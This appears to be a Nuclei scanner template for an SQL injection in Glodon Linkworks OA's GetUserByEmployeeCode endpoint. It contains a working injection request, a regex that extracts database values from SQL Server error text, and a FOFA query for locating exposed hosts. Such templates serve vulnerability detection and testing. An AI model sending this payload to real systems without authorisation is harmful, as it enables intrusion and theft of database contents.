nuclei-templates/http/vulnerabilities/other/glodon-linkworks-sqli.yaml

40 lines
1.5 KiB
YAML
Raw Normal View History

2024-02-19 03:09:57 +00:00
id: glodon-linkworks-sqli
info:
2024-02-19 18:35:49 +00:00
name: Glodon Linkworks GWGdWebService - SQL injection
2024-02-19 03:09:57 +00:00
author: DhiyaneshDK
severity: high
description: |
There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
reference:
- https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
2024-02-19 18:35:49 +00:00
fofa-query: banner="Services/Identification/login.ashx"
2024-02-19 03:09:57 +00:00
tags: glodon,linkworks,sqli
http:
- raw:
- |
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
employeeCode=1'-1/user--'&EncryptData=1
2024-02-19 18:35:49 +00:00
matchers:
- type: dsl
dsl:
- 'status_code==500'
- 'contains_any(header, "text/html", "text/plain")'
- 'contains_all(body, "在将 nvarchar 值", "转换成数据类型 int 时失败")'
condition: and
2024-02-19 03:09:57 +00:00
extractors:
- type: regex
part: body
group: 1
regex:
- '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'
# digest: 4a0a004730450221008ce688c7919d576b9c147ef7f0695c1581baa78bdd6e49403c3438c001b9c3c802202e786a6bf132bcabdd1c7d1b5052739c4ac94bdae01a558bfcd28515981a9481:922c64590222798bb761d5b6d8e72950